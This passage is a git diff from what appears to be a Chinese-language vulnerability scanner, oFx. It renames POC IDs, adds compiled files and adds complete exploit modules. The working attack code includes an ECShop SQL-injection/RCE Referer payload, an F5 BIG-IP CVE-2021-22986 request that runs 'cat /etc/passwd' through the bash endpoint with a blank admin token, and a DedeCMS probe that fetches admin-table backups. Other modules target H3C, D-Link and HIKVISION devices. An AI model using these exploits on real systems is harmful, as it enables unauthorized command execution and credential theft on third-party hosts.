req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "Blen{3996=null}" in req.text:
+ if "ofx{3996=null}" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8d87cbd
Binary files /dev/null and b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Coremail/Conf_Info_Disclosure/poc.py b/poc/Coremail/Conf_Info_Disclosure/poc.py
index fb7ea6b..0663f4b 100644
--- a/poc/Coremail/Conf_Info_Disclosure/poc.py
+++ b/poc/Coremail/Conf_Info_Disclosure/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Coremail 配置信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Coremail", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..24c7faa
Binary files /dev/null and b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py
index 840540d..c04ba3e 100644
--- a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py
+++ b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "赤兔CMS banner识别插件", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "赤兔CMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d919e32
Binary files /dev/null and b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bcaed03
Binary files /dev/null and b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py
index 0942745..8fa7c22 100644
--- a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py
+++ b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "D-Link ShareCenter DNS-320", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c3e6ae6
Binary files /dev/null and b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py
similarity index 100%
rename from poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py
rename to poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py
diff --git a/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e73a5db
Binary files /dev/null and b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/D_Link/Weak_Pass_AC_Manager/poc.py b/poc/D_Link/Weak_Pass_AC_Manager/poc.py
index 7ec186c..d36937d 100644
--- a/poc/D_Link/Weak_Pass_AC_Manager/poc.py
+++ b/poc/D_Link/Weak_Pass_AC_Manager/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "D-Link AC管理系统默认账号密码", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "D-Link AC管理系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2527b33
Binary files /dev/null and b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py
new file mode 100644
index 0000000..cce10fc
--- /dev/null
+++ b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py
@@ -0,0 +1,76 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 备份文件的地址会写在md输出中
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "DedeCMS 短文件名信息泄露", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ IIS下,会因为固有的短文件名问题导致配置文件的地址可以被猜解
+ 猜解出来的文件url,存的信息是dede_admin表的备份,可能存在过期现象,要有心理准备
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/data/backupdata/dede_a~" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ for i in range(1,9):
+ now_url = url + str(i) + ".txt"
+ req = requests.get(now_url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and "INSERT INTO `dede_admin`" in req.text:
+ vuln = [True,"" + now_url + "\n" + req.text]
+ break
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..6f4c93e
Binary files /dev/null and b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/DedeCMS_织梦/RadminPass/poc.py b/poc/DedeCMS_织梦/RadminPass/poc.py
index 5ab6e97..9ea1e47 100644
--- a/poc/DedeCMS_织梦/RadminPass/poc.py
+++ b/poc/DedeCMS_织梦/RadminPass/poc.py
@@ -17,8 +17,8 @@ class POC(POCBase):
略
""", # POC描述,写更新描述,没有就不写
- "name" : "radminpass.php文件暴露", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "name" : "织梦CMS radminpass.php文件暴露", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "dedecms", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b841ff3
Binary files /dev/null and b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/DocCMS/SQLi_keyword/poc.py b/poc/DocCMS/SQLi_keyword/poc.py
index fe4ff61..54d3d18 100644
--- a/poc/DocCMS/SQLi_keyword/poc.py
+++ b/poc/DocCMS/SQLi_keyword/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "DocCMS keyword SQL注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "DocCMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b5ae1f7
Binary files /dev/null and b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..f11ec34
Binary files /dev/null and b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d3d2541
Binary files /dev/null and b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py
new file mode 100644
index 0000000..ab76bec
--- /dev/null
+++ b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests,re
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "ECShop 2.x/3.x SQL 注入/远程代码执行漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/user.php?act=login" # url自己按需调整
+ regular = "PHP Version [0-9\.]+"
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Referer": """45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a""",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if re.search(regular,req.text):#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5848e40
Binary files /dev/null and b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4d0f9ac
Binary files /dev/null and b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..aa2fe15
Binary files /dev/null and b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..fceb642
Binary files /dev/null and b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..053106a
Binary files /dev/null and b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..41bf8a2
Binary files /dev/null and b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b2f205e
Binary files /dev/null and b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..982cce3
Binary files /dev/null and b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py
index 269fcfa..e5c1d9b 100644
--- a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py
+++ b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py
@@ -33,7 +33,7 @@ class POC(POCBase):
""", # 漏洞简要描述
"fofa-dork":"""
- title="BIG-IP®"
+ title="BIG-IP®"
""", # fofa搜索语句
"example" : "https://54.206.65.62:443", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2294e13
Binary files /dev/null and b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py
new file mode 100644
index 0000000..f738899
--- /dev/null
+++ b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py
@@ -0,0 +1,75 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "CVE-2021-22986 RCE", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="BIG-IP®"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/mgmt/tm/util/bash" # url自己按需调整
+ data = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}'''
+
+ headers = {"User-Agent":get_random_ua(),
+ 'Accept': '*/*',
+ 'Connection': 'close',
+ 'Authorization': 'Basic YWRtaW46',
+ 'X-F5-Auth-Token': '',
+ 'Content-Type': 'application/json'
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "root:/root" in req.text and req.status_code == 200:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..96950a8
Binary files /dev/null and b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/FLIR_菲力尔/Download_File_AX8/poc.py b/poc/FLIR_菲力尔/Download_File_AX8/poc.py
index 3269b2e..32a996a 100644
--- a/poc/FLIR_菲力尔/Download_File_AX8/poc.py
+++ b/poc/FLIR_菲力尔/Download_File_AX8/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "FLIR-AX8 download.php 任意文件下载", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "FLIR-AX8", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Flask_Ssti_CVE-2017-12636/poc.py b/poc/Flask_Ssti_CVE-2017-12636/poc.py
deleted file mode 100644
index 308d66a..0000000
--- a/poc/Flask_Ssti_CVE-2017-12636/poc.py
+++ /dev/null
@@ -1,59 +0,0 @@
-# coding:utf-8
-import requests
-from lib.core.common import url_handle,get_random_ua
-# ...
-import urllib3
-urllib3.disable_warnings()
-_info = {
- "author" : "", # POC作者
- "version" : "1", # POC版本,默认是1
- "CreateDate" : "2021-06-09", # POC创建时间
- "UpdateDate" : "2021-06-09", # POC创建时间
- "PocDesc" : """
- 该POC不具备使用价值,请忽略
- """, # POC描述,写更新描述,没有就不写
-
- "name" : "Flask 模板注入", # 漏洞名称
- "AppName" : "Flask", # 漏洞应用名称
- "AppVersion" : "", # 漏洞应用版本
- "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
- "VulnDesc" : """
-
- """, # 漏洞简要描述
-
- "fofa-dork":"", # fofa搜索语句
- "example" : "", # 存在漏洞的演示url,写一个就可以了
- "exp_img" : "", # 先不管
-
- "timeout" : 10, # 超时设定
-}
-
-def verify(host,proxy):
- """
- 返回vuln
- 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
- 不存在漏洞:vuln = [False,""]
- """
- vuln = [False,""]
- url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整
-
-
-
- headers = {"User-Agent":get_random_ua(),
- "Connection":"close",
- # "Content-Type": "application/x-www-form-urlencoded",
- }
-
- try:
- """
- 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
- """
- req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False)
- if req.status_code == 200 and "54289" in req.text:
- vuln = [True,req.text]
- else:
- vuln = [False,req.text]
- except Exception as e:
- raise e
-
- return vuln
\ No newline at end of file
diff --git a/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..20e77a0
Binary files /dev/null and b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4cad1d4
Binary files /dev/null and b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/H2_DataBase/UnAuth_Access/poc.py b/poc/H2_DataBase/UnAuth_Access/poc.py
index aeb1c32..3e05b91 100644
--- a/poc/H2_DataBase/UnAuth_Access/poc.py
+++ b/poc/H2_DataBase/UnAuth_Access/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "H2 数据库 Web控制台未授权访问", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "H2 数据库", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2d6e641
Binary files /dev/null and b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/H3C/File_Download_SecPath_WAF/poc.py b/poc/H3C/File_Download_SecPath_WAF/poc.py
index 4eccc77..025bf34 100644
--- a/poc/H3C/File_Download_SecPath_WAF/poc.py
+++ b/poc/H3C/File_Download_SecPath_WAF/poc.py
@@ -10,15 +10,16 @@ class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
- "version" : "1", # POC版本,默认是1
+ "version" : "2", # POC版本,默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
- 略
+ v1 : 略
+ v2 : 小改进
""", # POC描述,写更新描述,没有就不写
"name" : "H3C SecPath 下一代防火墙 任意文件下载漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "H3C SecPath 下一代防火墙", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
@@ -55,11 +56,11 @@ class POC(POCBase):
"""
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
- req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
if "root::" in req0.text and req0.status_code == 200 :
vuln = [True,req0.text]
else:
- req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
if "root:" in req1.text and req1.status_code == 200:
vuln = [True,req1.text]
else:
diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5372bac
Binary files /dev/null and b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py
index b04db0c..90c61a9 100644
--- a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py
+++ b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "HIKVISION 视频编码设备接入网关 任意文件下载", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "海康威视视频接入网关系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..f7b5d33
